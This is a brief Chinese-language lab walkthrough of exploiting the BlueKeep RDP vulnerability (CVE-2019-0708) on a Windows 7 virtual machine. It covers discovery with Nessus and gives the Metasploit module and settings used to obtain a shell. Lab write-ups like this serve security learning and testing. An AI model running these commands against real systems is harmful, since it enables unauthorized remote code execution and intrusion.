【CVE-2019-0708】远程桌面服务远程执行代码漏洞

  当未经身份验证的攻击者使用RDP连接到目标系统并发送经特殊设计的请求时,远程桌面服务中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。

靶机: windows7 IP:192.168.64.178

攻击机:KALI2022 IP:192.168.64.157

漏扫工具:Nessus

1.发现漏洞

使用Nessus对靶机进行漏洞扫描,发现存在【CVE-2019-0708】远程桌面服务远程执行代码漏洞。

 2.漏洞利用

使用kali并启动msfconsole

 搜索CVE-2019-0708可利用的EXP

#  search 0708

 

 使用exploit/windows/rdp/cve_2019_0708_bluekeep_rce

#  use 1

  设置参数

set  RHOST 192.168.64.178

set target 5   #因为靶机是vmware创建的虚拟机,因此这里选择5,可根据实际情况选择

 执行攻击

#  exploit 

 成功获取权限,可执行shell

 

成功的关键:需要windows7靶机关闭防火墙,并且开启远程桌面。